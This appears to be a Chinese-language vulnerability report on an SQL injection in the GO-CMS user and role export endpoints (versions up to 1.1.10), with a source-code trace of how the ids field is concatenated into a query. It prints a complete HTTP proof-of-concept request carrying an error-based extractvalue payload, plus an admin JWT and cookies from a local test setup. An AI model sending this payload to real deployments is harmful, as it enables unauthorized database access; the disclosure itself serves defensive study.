作者 修订时间
wjlin0 2024-12-11 12:01:22

0x01 漏洞说明

漏洞描述:发现在GO-CMS <=1.11.0,攻击者在导出用户/权限表格时,由于id直接拼接导致SQL注入

漏洞源码GO-CMS-1.1.10.zip

项目地址:https://github.com/Xi-Yuer/GO-CMS/

漏洞等级

影响版本<=1.1.10

漏洞URL

0x02 漏洞详情

1. 漏洞复现

该漏洞需要拥有对上述接口的权限,才能触发;如下,构造以下POC

POST /cms/roles/export HTTP/1.1
Host: localhost:5173
Content-Length: 73
sec-ch-ua-platform: "macOS"
Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjM0OTgwNjMxOTYwMDk2NzY4IiwiYWNjb3VudCI6ImFkbWluIiwiaXNBZG1pbiI6MSwicm9sZUlkIjpbIjM3OTA0MjA4NTYwNjU2Mzg0IiwiNDU4NjQ5NTAxMTA4ODM4NDAiXSwiaW50ZXJmYWNlRGljIjpbIlBPU1Q6L2RlcGFydG1lbnQiLCJERUxFVEU6L2RlcGFydG1lbnQvOmlkIiwiUEFUQ0g6L2RlcGFydG1lbnQvOmlkIiwiR0VUOi9pbnRlcmZhY2UvcGFnZS86aWQiLCJERUxFVEU6L2ludGVyZmFjZS86aWQiLCJQT1NUOi9pbnRlcmZhY2UiLCJQQVRDSDovaW50ZXJmYWNlLzppZCIsIkdFVDovdXBsb2FkIiwiREVMRVRFOi91cGxvYWQvZGVsLzppZCIsIlBPU1Q6L3VwbG9hZC9jaGVjayIsIlBPU1Q6L3VwbG9hZCIsIlBPU1Q6L3VwbG9hZC9maW5pc2giLCJQT1NUOi91cGxvYWQvZG93bmxvYWQvOmlkIiwiR0VUOi91cGxvYWQvYUhyZWYvZG93bmxvYWQvOmlkIiwiR0VUOi9hdXRoL2Nvb2tpZSIsIkdFVDovbG9nL3N5c3RlbSIsIkdFVDovdGltZVRhc2siLCJQT1NUOi90aW1lVGFzay9zdGFydC86aWQiLCJQT1NUOi90aW1lVGFzay9zdG9wLzppZCIsIlBBVENIOi90aW1lVGFzay91cGRhdGUvOmlkIiwiR0VUOi9wYWdlcy9tZW51cyIsIlBPU1Q6L3VzZXJzIiwiR0VUOi9zeXN0ZW0iLCJHRVQ6L2xvZy9jb21taXRzIiwiR0VUOi9sb2cvY29tbWl0cy9jb3VudCIsIlBPU1Q6L3VzZXJzL3F1ZXJ5IiwiUE9TVDovcm9sZXMvcXVlcnkiLCJHRVQ6L2RlcGFydG1lbnQiLCJQQVRDSDovdXNlcnMvOmlkIiwiREVMRVRFOi91c2Vycy86aWQiLCJHRVQ6L3VzZXJzLzppZCIsIkRFTEVURTovcm9sZXMvOmlkIiwiUE9TVDovcm9sZXMvZXhwb3J0IiwiUE9TVDovdXNlcnMvZXhwb3J0IiwiUEFUQ0g6L3JvbGVzLzppZCIsIlBPU1Q6L3JvbGVzIiwiUE9TVDovcGFnZXMiLCJERUxFVEU6L3BhZ2VzLzppZCIsIkdFVDovcGFnZXMiLCJHRVQ6L3BhZ2VzL3VzZXIiLCJQQVRDSDovcGFnZXMvOmlkIiwiR0VUOi9wYWdlcy9yb2xlLzppZCIsIkdFVDovdXNlcnMvcm9sZS86aWQiLCJQT1NUOi9yb2xlcy9iaW5kVXNlciIsIlBPU1Q6L3JvbGVzL2RlQmluZFVzZXIiLCJQT1NUOi91c2Vycy9xdWVyeS9yb2xlLzppZCJdLCJkZXBhcnRtZW50SWQiOm51bGwsImlzcyI6IlhpLVl1ZXIiLCJzdWIiOiJhZG1pbiIsImV4cCI6MTczMzk2NTYyNSwibmJmIjoxNzMzODc5MjI2LCJpYXQiOjE3MzM4NzkyMjUsImp0aSI6IjM0OTgwNjMxOTYwMDk2NzY4In0.Cd2CJg1TpqdkSn3F2F1LZlfUeH7hGxclLD34PH7zzK8
Accept-Language: zh-CN,zh;q=0.9
sec-ch-ua: "Not?A_Brand";v="99", "Chromium";v="130"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Accept: application/json, text/plain, */*
Content-Type: application/json
Origin: http://localhost:5173
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:5173/
Accept-Encoding: gzip, deflate, br
Cookie: Phpstorm-f30b1e9e=0694f073-c92a-4934-afee-c48c22785c21; Goland-852c6800=72bd19d4-b952-464f-9518-4cf4be331da3; device_id=61941ffb39fe4eafa03839d648f83ed5; FUCNdjYGFg4G=MTczMzg3OTIyNXxEWDhFQVFMX2dBQUJFQUVRQUFBRV80QUFBQT09fH-QTxZOkvnjo5WwV5AqR_ilvvDPSEgjD7WXHb4XSkfi
Connection: keep-alive

{"ids":["1) and extractvalue('~',concat('~',(select database()))) --  "]}

image-20241211111851195

同理,在用户功能导出表格时,也会触发SQL注入

image-20241211112123856

2. 源码分析

以导出用户表格为例,攻击者发送恶意代码,首先会触发controllers.UserController.ExportExcel 控制器

image-20241211112358410

系统首先拿到JSON中的ids字段,并调用services.UserService.ExportExcel函数

image-20241211112536615

继续调用 repositories.UserRepositorysModules.ExportExcel函数

image-20241211112628566

在这个函数中,可以发现,传递的ids字段,通过逗号分隔后,直接拼接到了 query 后

image-20241211112813219

最终恶意语句被执行

image-20241211112850992

results matching ""

    No results matching ""